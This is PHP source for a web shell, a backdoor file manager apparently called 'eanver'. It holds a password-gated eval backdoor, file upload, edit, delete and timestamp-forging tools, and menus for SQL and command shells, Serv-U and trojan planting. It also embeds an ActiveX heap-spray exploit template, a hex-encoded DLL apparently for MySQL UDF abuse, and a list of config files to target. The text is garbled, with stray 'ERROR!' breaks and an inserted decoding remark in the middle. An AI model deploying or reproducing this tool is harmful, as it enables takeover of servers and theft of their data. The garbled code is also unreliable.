"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
"rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".
"/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".
"OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".
"aNOmRcjVj02tPxPCzfkvIAA7"
);
header('Content-type: image/gif');
echo base64_decode($images[$img]);
die();
}
function css_showimg($file){
$it=substr($file,-3);
switch($it){
case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img';break;
case "htm": case "tml": return 'html';break;
case "exe": case "com": return 'exe';break;
case "xml": case "doc": return 'xml';break;
case ".js": case "vbs": return 'js';break;
case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return 'mp3';break;
case "rar": case "tar": case ".gz": case "zip":case "iso": return 'rar';break;
default: return 'txt';break;
}
}
function css_js($num,$code = ''){
if($num == "shellcode"){
return '<%@ LANGUAGE="JavaScript" %>
<%
var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
var shellcode = unescape("'.$code.'");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = "";
while (buffer.length < 1319) buffer+="A";
buffer=buffer+"
"+buffer;
act.hgs_startNotify(buffer);
%>';
}
html_n('<script language="javascript">');
if($num == "1"){
html_n(' function rusurechk(msg,url){
smsg = "FileName:[" + msg + "]\nPlease Input New File:";
re = prompt(smsg,msg);
if (re){
url = url + re;
window.location = url;
}
}
function rusuredel(msg,url){
smsg = "Do You Suer Delete [" + msg + "] ?";
if(confirm(smsg)){
URL = url + msg;
window.location = url;
}
}
function Delok(msg,gourl)
{
smsg = "[" + unescape(msg) + "]?";
if(confirm(smsg))
{
if(gourl == \'b\')
{
document.getElementById(\'actall\').value = escape(gourl);
document.getElementById(\'fileall\').submit();
}
else window.location = gourl;
}
}
function CheckAll(form)
{
for(var i=0;i<form.elements.length;i++)
{
var e = form.elements[i];
if (e.name != \'chkall\')
e.checked = form.chkall.checked;
}
}
function CheckDate(msg,gourl)
{
smsg = ":[" + msg + "]";
re = prompt(smsg,msg);
if(re)
{
var url = gourl + re;
var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
var r = re.match(reg);
if(r==null){alert(\'!:yyyy-mm-dd hh:mm:ss\');return false;}
else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}
}
}
function SubmitUrl(msg,txt,actid)
{
re = prompt(msg,unescape(txt));
if(re)
{
document.getElementById(\'actall\').value = actid;
document.getElementById(\'inver\').value = escapERROR!
e(re);
document.getElementById(\'fileall\').submit();
}
}');
}elseif($num == "2"){
html_n('var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
var txt, i, found;
if(str == "")return false;
if(NS4){
if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
if(n == 0) alert(str + " ... Not-Find")
}
if(IE4){
txt = win.document.body.createTextRange();
for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
txt.moveStart("character", 1);
txt.moveEnd("textedit")
}
if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
}
return false
}
function CheckDate(){
var re = document.getElementById(\'mtime\').value;
var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
var r = re.match(reg);
var t = document.getElementById(\'charset\').value;
t = t.toLowerCase();
if(r==null){alert(\'!:yyyy-mm-dd hh:mm:ss\');return false;}
else{document.getElementById(\'newfile\').value = base64encode(document.getElementById(\'newfile\').value);
if(t=="utf-8"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}
');
if (substr(PHP_VERSION,0,1)>=5){html_n('if(t=="gbk" || t=="gb2312"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}');}
html_n('
document.getElementById(\'editor\').submit();}
}');
}elseif($num == "3"){
html_n('function Full(i){
if(i==0 || i==5){
return false;
}
Str = new Array(12);
Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";
Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";
Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";
Str[4] = "Provider=MSDAORA.1;Password=;User ID=;Data Source=;Persist Security Info=True;";
Str[6] = "SELECT * FROM [TableName] WHERE ID<100";
Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')";
Str[8] = "DELETE FROM [TableName] WHERE ID=100";
Str[9] = "UPDATE [TableName] SET USER=\'eanver\' WHERE ID=100";
Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
Str[11] = "DROP TABLE [TableName]";
Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
if(i<=4){
DbForm.string.value = Str[i];
}else{
DbForm.sql.value = Str[i];
}
return true;
}');
}
elseif($num == "4"){
html_n('function Fulll(i){
if(i==0){
return false;
}
Str = new Array(8);
Str[1] = "config.inc.php";
Str[2] = "config.inc.php";
Str[3] = "config_base.php";
Str[4] = "config.inc.php";
Str[5] = "config.php";
Str[6] = "wp-config.php";
Str[7] = "config.php";
Str[8] = "mysql.php";
sform.code.value = Str[i];
return true;
}');
}
html_n('</script>');
}
function css_left(){
html_n('<style type="text/css">
.menu{width:152px;margin-left:auto;margin-right:auto;}
.menu dl{margin-top:2px;}
.menu dl dt{top left repeat-x;}
.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
.menu dl dt a:hover{color:#FFFFCC;}
.menu dl dd ul{list-style:none;}
.menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
border-style:solid;border-width:1px;}
.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
</STYLE>');
html_n('<script language="javascript">
function getObject(objectId){
if(document.getElERROR!
ementById && document.getElementById(objectId)) {
return document.getElementById(objectId);
}
else if (document.all && document.all(objectId)) {
return document.all(objectId);
}
else if (document.layers && document.layers[objectId]) {
return document.layers[objectId];
}
else {
return false;
}
}
function showHide(objname){
var obj = getObject(objname);
if(obj.style.display == "none"){
obj.style.display = "block";
}else{
obj.style.display = "none";
}
}
</script><div class="menu">');
}
function css_main(){
html_n('<style type="text/css">
*{padding:0px;margin:0px;}
body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}
body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;
height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}
input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
</STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
<table width="85%" border=0 bgcolor="#555555" align="center">');
}
function css_foot(){
html_n('</td></tr></table>');
}
function Mysql_shellcode()
{
return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F2950208B6F46C5BB6F46C5BB6F46C5B9132175BB4F46C5B9132115BB7F46C5B9132025BB4F46C5B9132015BBBF46C5B75FB315BB5F46C5BB6F46D5B9AF46C5B91321D5BB7F46C5B9132165BB7F46C5B9132145BB7F46C5B52696368B6F46C5B0000000000000000504500004C0103004E10A34D0000000000000000E00002210B010800001000000010000000600000D07B0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000B0810000C800000000800000B001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009C7D00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E055505831000000000010000000700000000E000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000120000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303500555058210D09020947A37B47FAE6101946550000C90B000000200000260000A4FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015EAEFDBBFDC3C38B44240C1B6A071711108BF81933FFDFEDB7181DA45FC7011E12005E210883380175128B40040DF6776F0700750A1004C6000132C0C3540A6F2FF68D3C3054A455322D08FF30BFBDFBDDFF156D8885C05975085614C601011BC8568D7101FFDBB7FF8A114184D275F98B54142BCE890A32558BEC8B4D0C8339022D36D86F5374148B7D10915C54536F67EFF7EB4C8B417D740F1B707C1BEBE58366ECFFED6004001A0C8B48048B008D4401025072A037F2DD6E4E08891875113006A44CDD96EFEDEBB2B85F5E5DA3040C287408DBF6C79E33A8591353568B742410D8785346BB707B6B02B6460851C78D5C4357E824CEDDFD770AB81400C604070008FF70041E05767B43B2531A22C4185357200300544126E136086A995B420B7E780A84033B9859991A83EC0CFB5BFBEB9735D9576800F15CD66A018945FC06BB75DD7F8BF08B450CC60600326848C03733FF396DEDEF1E9C8B1D0590506A04FF75FC2AACD37D2EBCBD991CEB402DFC8D487E10402BC1B68D6DBF18F803C7505606F4348C2BF851BBB5B1BB3003FE5710940BD47DF44463EEC21741202F75BC131CA40B03FBFF803E0059741A8BC6C64437FF00567B14DF3AB68589B3066C18285F205E5BC9C3D6B6AE73F3C951F77D5247E3306DDB2CCB5008C9C26A98F0BF1726B4B710548D4601B23B5C4F08EDDB09EE56FF31BBA0947E0C6AFF8DC082B55D7B2082EE02F8092C0FDBC6C123005FEE5E6B6A0C125E58F886909609848365FC1D4550D0EB075BD85ED81B405F65E8C742FE24FF0D0BDB855F1FC9C24E3B0D08209602DBCEFEEDF3C3E908065556688000005680965608B8BFCB1F8485F65959A32354045075054BFEED762FAC8326004308166D083E0904C70424FF098FDD06075D0B5933C0CF5533ED3BC5750EDD7F85DD392D66107E2B6E1083F8018B0810DD7D77E1548B09DB57890A23440F85CC7964A118771C61C3058104C2385521234CEB0DF6DFB5184D9D051A3BC7741768E803A03CEE76C3B6FF57A1D396E7EB036645A12BB7FBFBB7480D6A025F74096A1FE056EB3C9E10C80460FADCF7C0C7051F015E1A50267FDF77B6C007581720BC04B81B4A5989F784A6B13D4BEDBC5504408312C97DEFD258851E6807E4DE4294BBBD7769FF321C57042618FF05E0BD6F6BDF5414F7D38ECD3DCAB6C6809DC90BBE55C75BD783BD10EBBEEBB91402740AB759BE8D1DB6EB4835713B78258BD885DBB8B410DB6C3414EED7E1F8EBF45F68DA4607C102DC83EF043BFB73F1530811C682CA067CAAB4307B1B8525E32D60C77C6C7CC9BC985B5DC20C3E1029286FB86F8D8B8FF28B5D081C73E433C9F04DBBD2894D376A2008683BF1751039FFC75688B60C17E426103BF0740583FE5BA1F5EE02752EB910D03BC148897FD0DB39F7773B837DE4000F8493F6115A037F147D27D99AA71280096227FEAC9DDD6D1324FB2057501357A72F8DF6BAD852D90611537C67BB617F6A0375434F34032168746D3CECB02E2C257FEB1BF0ECA3F0BD75BB09AAE05051595CE7F9413AB5D20B2F0F013D46DA761906292AE407C31B6D5B8DAEEC16FFD79A089A052CD0307CD600D688BC109B0C770DAB0C10051E5936C981ECE18F0D8628C55D2120BC211C895A3F3EECB8211889B3211438211041210C7DED6BDF668C183806252C062008A9344BB306050425001A6C63EDFBFC9C8F14309156240704ACFDB7F428F20807348B85E0FC9CA6B67B5B6370C201A11C19202413778E513A1809C9E0201C1DB37CEE25D38985D8320A04DC7E8D6F04FF24346879DF945963EC63B04128FAD40A2CE7BDC3B6DA20110823685B9E0A678D1B3068342F033C887C5CF81E9A5B6A144650C0C391C1B435D659E7F85A1B63ED324D3970D7619FB8363BFC37AC598B2E2827ADD0BA60D90AE0F3B903B16DFBDCE450352AA612DC0AE45440DB626C60D6D30FE009859710C3D4E5D107FB371DDAD984DCD166A09EC3BB0E6EFF1A65F7D81BC00359487EB8B018BF2DB1D57A0451E5735806B0D2CB2049C6F772F11F23C28E90672020CC00D0FA054727D281394D5A748BA1F09728EE973C03C1813850CE4936F85B69F04F1878180B010F941DC1FC3612C336844825C80FB74114121BDF0A0505710633D2EC57C9FABF9DF80818761E201D0C3BF972098B580803D9D4FEB758E07221C20183C0283BD672E660619241C0C2E970BA0330D0FD7AF00052996C59AB3DF94B7CC7365D50109C59112B29244F07E1F6C1E81FF7C3E00134EB202E00C1AC636B01A33D3EC0A2B11D85942845AB105805E3A491914C50AC2D13348483A1D287206DEADC35936B204A2CE7A309E1646DA91938DE09F3186C036D0C039B8D2BE0FAA8316AC1DA89F633C5508973810B796DEF0D139E04F064A337904DC3BBDBA9096900595FFA8BE55D51D8C3BB1BD810036803276850F9C4CEC2C5B28C3E1064F82D222D20F8FEA0BF4EE640BB1ABC1958D3BB86360D85C32C33B63F15101404EB605671F8E3C61E6BED448B75948E0B1033F00714EDCC95411899271CB0E0BED1DAF4330C11137507BE4F59C02FD12EE285F30AF7C1E0100BF006E1638F4400F7D607045E5F5B495C464646C6056064686C0064474674B00000472FEC0003360F201801FF7FFBFF4E6F20617267756D656E7473096C6C6F77656420287564663A206CDCDF76FF69625F6D7973716C0D5F73085F696E666F29396DFBFFC8182076657273696F6E20302E01341FBFBDDDFD45787065637447657861076C79201A6520737472B5ADB56F3F672074791B7572617105EC00B621722B747791FD36B0801F3F8672206E616D1D7BFB8148436F756C246E6F74C463618375DBB61320186D2779AF72F148A9DD44093F2003121013DF8B05F6E119216B07D0D6D5B0200F1F2D07293BAC7B05F90B0D17CC27DD099BB0070FD81F0928033C92E85E611F030F0313E944D9000000EC1B6814E5B119BF44FF00515565110FC9A8AADid this file decode correctly?
Original Code
php /tmp/BNL43pbbLb.php
ob_start();
define('myaddress',$_SERVER['SCRIPT_FILENAME']);
define('postpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
if(@get_magic_quotes_gpc()){
foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
}
if(isset($_REQUEST[postpass])){
hmlogin(2);
@eval($_REQUEST[postpass]);
exit;}
if($_COOKIE['postpass'] != md5(postpass)){
if($_POST['postpass']){
if($_POST['postpass'] == postpass){
setcookie('postpass',md5($_POST['postpass']));
hmlogin();
}else{
echo '<CENTER></CENTER>';
}
}
islogin($shellname,$myurl);
exit;
}
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){
$dir = do_show($_GET['pack']);
$zip = new eanver($dir);
$out = $zip->out;
do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");
}
if(isset($_GET['unzip'])){
css_main();
start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
exit;
}
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS, 0, 3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if($img) css_img($img);
if($eanver == "phpinfo") die(phpinfo());
if($eanver == 'logout'){
setcookie('postpass',null);
die('<meta http-equiv="refresh" content="0;URL=?">');
}
$class = array(
"" => array("upfiles" => "","phpinfo" => "","info_f" => "","phpcode" => "PHP"),
"" => array("sqlshell" => "SQL","mysql_exec" => "MYSQL","myexp" => "MYSQL","servu" => "Serv-U","cmd" => "","linux" => "","downloader" => "","port" => ""),
"" => array("guama" => "","tihuan" => "","scanfile" => "","scanphp" => ""),
"" => array("getcode" => "")
);
$msg = array("0" => "","1" => "","2" => "","3" => "","4" => "","5" => "","6" => "","7" => "");
css_main();
switch($eanver){
case "left":
css_left();
html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\">");
html_img("title");html_n(" </a></dt><dd id=\"items1\" style=\"display:block;\"><ul>");
$ROOT_DIR = File_Mode();
html_n("<li><a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'></a></li>");
html_n("<li><a href='?eanver=main' target='main'></a></li>");
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;
html_n("<li><a title='$drive' href='?eanver=main&path=$drive' target='main'>($drive)</a></li>");}}
html_n("</ul></dd></dl>");
$i = 2;
foreach($class as $name => $array){
html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
html_img("title");html_n(" $name</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
foreach($array as $url => $value){
html_n("<li><a href=\"?eanver=$url\" target='main'>$value</a></li>");
}
html_n("</ul></dd></dl>");
$i++;
}
html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
html_img("title");html_n(" </a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
html_n("<li><a title='' href='?eanver=logout' target=\"main\"></a></li>");
html_n("</ul></dd></dl>");
html_n("</div>");
break;
case "main":
css_js("1");
$dir = @dir($path);
$REAL_DIR = File_Str(realpath($path));
if(!empty($_POST['actall'])){echo '<div class="actall">'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'</div>';}
$NUM_D = $NUM_F = 0;
if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
$ROOT_DIR = File_Mode();
html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>:<input type='hidden' name='eanver' value='main'>");
html_n("<input type='text' size='80' name='path' value='$path'> <input type='submit' value=''></form>");
html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'>");
html_n("<input type=\"button\" value=\"\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"> <input type=\"button\" value=\"\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\">");
html_input("file","upfilet",""," ");
html_input("submit","uploadt","");
if(!empty($_POST['newfile'])){
if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
$newfile=base64_decode($_POST['newfile']);
if(strtolower($_POST['charset'])=='utf-8'){$txt=base64_decode($_POST['txt']);}else{$txt=$_POST['txt'];}
if (substr(PHP_VERSION,0,1)>=5){if((strtolower($_POST['charset'])=='gb2312') or (strtolower($_POST['charset'])=='gbk')){$txt=iconv("UTF-8","gb2312//IGNORE" ,base64_decode($_POST['txt']));}else{$txt = array_iconv($txt);}}
echo do_write($newfile,$bin,$txt) ? '<br>'.$newfile.' '.$msg[0] : '<br>'.$newfile.' '.$msg[1];
@touch($newfile,@strtotime($_POST['time']));
}
html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
html_a('?eanver=main&path='.uppath($path),'<b></b>');
html_n('</b></td><td align="center" width="10%"><b></b></td><td align="center" width="5%"><b></b></td>');
html_n('<td align="center" width="8%"><b>('.get_current_user().')|</b></td>');
html_n('<td align="center" width="10%"><b></b></td><td align="center" width="10%"><b></b></td></tr>');
while($dirs = @$dir->read()){
if($dirs == '.' or $dirs == '..') continue;
$dirpath = str_path("$path/$dirs");
if(is_dir($dirpath)){
$perm = substr(base_convert(fileperms($dirpath),10,8),-4);
$filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));
$dirpath = urlencode($dirpath);
html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$dirs.'">');
html_img("dir");
html_a('?eanver=main&path='.$dirpath,$dirs);
html_n('</td><td align="center">');
html_n("<a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');return false;\"></a>");
html_n("<a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');return false;\"></a> ");
html_a('?pack='.$dirpath,'');
html_n('</td><td align="center">');
html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);
html_n('</td><td align="center">'.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs"));
html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
html_n('</td></tr>');
$NUM_D++;
}
}
@$dir->rewind();
while($files = @$dir->read()){
if($files == '.' or $files == '..') continue;
$filepath = str_path("$path/$files");
if(!is_dir($filepath)){
$fsize = @filesize($filepath);
$fsize = File_Size($fsize);
$perm = substr(base_convert(fileperms($filepath),10,8),-4);
$filetime = @date('Y-m-d H:i:s',@filemtime($filepath));
$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);
$todir=$ROOT_DIR.'/zipfile';
$filepath = urlencode($filepath);
$it=substr($filepath,-3);
html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$files.'">');
html_img(css_showimg($files));
html_a($Fileurls,$files,'target="_blank"');
html_n('</td><td align="center">');
if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))
html_a('?unzip='.$filepath,'','title="'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"');
else
html_a('?eanver=editr&p='.$filepath,'','title="'.$files.'"');
html_n("<a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');return false;\"></a>");
html_n("<a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');return false;\"></a> ");
html_n("<a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');return false;\"></a>");
html_n('</td><td align="center">');
html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);
html_n('</td><td align="center">'.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files"));
html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
html_a('?down='.$filepath,$fsize,'title="'.$files.'"');
html_n('</td></tr>');
$NUM_F++;
}
}
@$dir->close();
if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);
print<<<END
</table>
<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined">
<input type="hidden" id="inver" name="inver" value="undefined">
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);">
<input type="button" value="" onclick="SubmitUrl(': ','{$REAL_DIR}','a');return false;">
<input type="button" value="" onclick="Delok('','b');return false;">
<input type="button" value="" onclick="SubmitUrl(': ','0666','c');return false;">
<input type="button" value="" onclick="CheckDate('{$Filetime}','d');return false;">
<input type="button" value="" onclick="SubmitUrl(': ','{$_SERVER['SERVER_NAME']}.tar.gz','e');return false;">
({$NUM_D}) / ({$NUM_F})</div>
</form>
END;
break;
case "editr":
print<<<END
<script>
END;
html_base();
print<<<END
</script>
END;
css_js("2");
if(!empty($_POST['uploadt'])){
echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
}
if(!empty($_GET['redir'])){
$name=$_GET['name'];
$newdir = str_path($p.'/'.$name);
@mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
}
if(!empty($_GET['refile'])){
$name=$_GET['name'];
$jspath=urlencode($p.'/'.$name);
$pp = urlencode($p);
$p = str_path($p.'/'.$name);
$FILE_CODE = "";
$charset= 'GB2312';
$FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);
if(@file_exists($p)) echo '""<br>';
}else{
$jspath=urlencode($p);
$FILE_TIME = date('Y-m-d H:i:s',filemtime($p));
$FILE_CODE=@file_get_contents($p);
if (substr(PHP_VERSION,0,1)>=5){
if(empty($_GET['charset'])){
if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';}
}else{
if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}
}
}
$FILE_CODE = htmlspecialchars($FILE_CODE);
}
print<<<END
<div class="actall">: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
<input type="button" value="" onclick="search(searchs.value)"></div>
<form method='POST' id="editor" action='?eanver=main&path={$pp}'>
<div class="actall">
<input type="text" name="newfile" id="newfile" value="{$p}" style="width:750px;"><input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this.value;">
<input type="button" value="" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset.value;" style="width:50px;">
END;
